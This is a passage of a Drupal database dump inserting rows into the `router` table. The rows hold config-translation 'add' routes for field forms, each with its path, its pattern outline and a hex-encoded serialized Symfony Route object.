226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131343a227b5e2f61646d696e2f7374727563747572652f646973706c61795c2d6d6f6465732f766965772f6d616e6167652f283f503c656e746974795f766965775f6d6f64653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31363a22656e746974795f766965775f6d6f6465223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a34323a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f766965772f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31363a22656e746974795f766965775f6d6f6465223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a36303a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f766965772f6d616e6167652f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.add.entity.field_config.block_content_field_edit_form', '/admin/structure/block-content/manage/{block_content_type}/fields/{field_config}/translate/{langcode}/add', '/admin/structure/block-content/manage/%/fields/%/translate/%/add', 981, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a3130353a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f6669656c64732f7b6669656c645f636f6e6669677d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a32303a22626c6f636b5f636f6e74656e745f6669656c6473223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3134333a227b5e2f61646d696e2f7374727563747572652f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a373a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a353b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a363b613a323a7b693a303b733a343a2274657874223b693a313b733a33373a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3938313b733a31343a227061747465726e4f75746c696e65223b733a36343a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f252f6669656c64732f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a31303b7d7d, 10),
('config_translation.item.add.entity.field_config.block_content_field_edit_form.bc', '/admin/structure/block/block-content/manage/{block_content_type}/fields/{field_config}/translate/{langcode}/add', '/admin/structure/block/block-content/manage/%/fields/%/translate/%/add', 2005, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a3131313a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f6669656c64732f7b6669656c645f636f6e6669677d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a393a22706c7567696e5f6964223b733a32303a22626c6f636b5f636f6e74656e745f6669656c6473223b733a31313a225f636f6e74726f6c6c6572223b733a38313a225c44727570616c5c626c6f636b5f636f6e74656e745c436f6e74726f6c6c65725c426c6f636b436f6e74656e74436f6e74726f6c6c65723a3a626c6f636b436f6e74656e74547970655265646972656374223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3134393a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a373a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a353b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a363b613a323a7b693a303b733a343a2274657874223b693a313b733a34333a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a323030353b733a31343a227061747465726e4f75746c696e65223b733a37303a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f252f6669656c64732f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a31313b7d7d, 11),
('config_translation.item.add.entity.field_config.comment_field_edit_form', '/admin/structure/comment/manage/{comment_type}/fields/{field_config}/translate/{langcode}/add', '/admin/structure/comment/manage/%/fields/%/translate/%/add', 981, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a39333a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f7b636f6d6d656e745f747970657d2f6669656c64732f7b6669656c645f636f6e6669677d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a31343a22636f6d6d656e745f6669656c6473223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31323a22636f6d6d656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3133303a227b5e2f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f283f503c636f6d6d656e745f747970653e5b5e2f5d2b2b292f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a373a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a353b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6d6d656e745f74797065223b693a343b623a313b7d693a363b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31323a22636f6d6d656e745f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3938313b733a31343a227061747465726e4f75746c696e65223b733a35383a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f252f6669656c64732f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a31303b7d7d, 10),
('config_translation.item.add.entity.field_config.contact_message_field_edit_form', '/admin/structure/contact/manage/{contact_form}/fields/{field_config}/translate/{langcode}/add', '/admin/structure/contact/manage/%/fields/%/translate/%/add', 981, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a39333a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f7b636f6e746163745f666f726d7d2f6669656c64732f7b6669656c645f636f6e6669677d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a32323a22636f6e746163745f6d6573736167655f6669656c6473223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31323a22636f6e746163745f666f726d223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3133303a227b5e2f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f283f503c636f6e746163745f666f726d3e5b5e2f5d2b2b292f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a373a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a353b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6e746163745f666f726d223b693a343b623a313b7d693a363b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31323a22636f6e746163745f666f726d223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3938313b733a31343a227061747465726e4f75746c696e65223b733a35383a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f252f6669656c64732f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a31303b7d7d, 10),
('config_translation.item.add.entity.field_config.media_field_edit_form', '/admin/structure/media/manage/{media_type}/fields/{field_config}/translate/{langcode}/add', '/admin/structure/media/manage/%/fields/%/translate/%/add', 981, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38393a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f7b6d656469615f747970657d2f6669656c64732f7b6669656c645f636f6e6669677d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a31323a226d656469615f6669656c6473223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31303a226d656469615f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3132363a227b5e2f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f283f503c6d656469615f747970653e5b5e2f5d2b2b292f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a373a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a353b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31303a226d656469615f74797065223b693a343b623a313b7d693a363b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f6d656469612f6d616e616765223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31303a226d656469615f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3938313b733a31343a227061747465726e4f75746c696e65223b733a35363a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f252f6669656c64732f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a31303b7d7d, 10),
('config_translation.item.add.entity.field_config.node_field_edit_form', '/admin/structure/types/manage/{node_type}/fields/{field_config}/translate/{langcode}/add', '/admin/structure/types/manage/%/fields/%/translate/%/add', 981, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38383a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f7b6e6f64655f747970657d2f6669656c64732f7b6669656c645f636f6e6669677d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a31313a226e6f64655f6669656c6473223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a393a226e6f64655f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3132353a227b5e2f61646d696e2f7374727563747572652f74797065732f6d616e6167652f283f503c6e6f64655f747970653e5b5e2f5d2b2b292f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a373a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a353b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a226e6f64655f74797065223b693a343b623a313b7d693a363b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f74797065732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a393a226e6f64655f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3938313b733a31343a227061747465726e4f75746c696e65223b733a35363a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f252f6669656c64732f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a31303b7d7d, 10);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('config_translation.item.add.entity.field_config.taxonomy_term_field_edit_form', '/admin/structure/taxonomy/manage/{taxonomy_vocabulary}/overview/fields/{field_config}/translate/{langcode}/add', '/admin/structure/taxonomy/manage/%/overview/fields/%/translate/%/add', 1973, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a3131303a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f7b7461786f6e6f6d795f766f636162756c6172797d2f6f766572766965772f6669656c64732f7b6669656c645f636f6e6669677d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a32303a227461786f6e6f6d795f7465726d5f6669656c6473223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3134373a227b5e2f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f283f503c7461786f6e6f6d795f766f636162756c6172793e5b5e2f5d2b2b292f6f766572766965772f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a373a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f61646422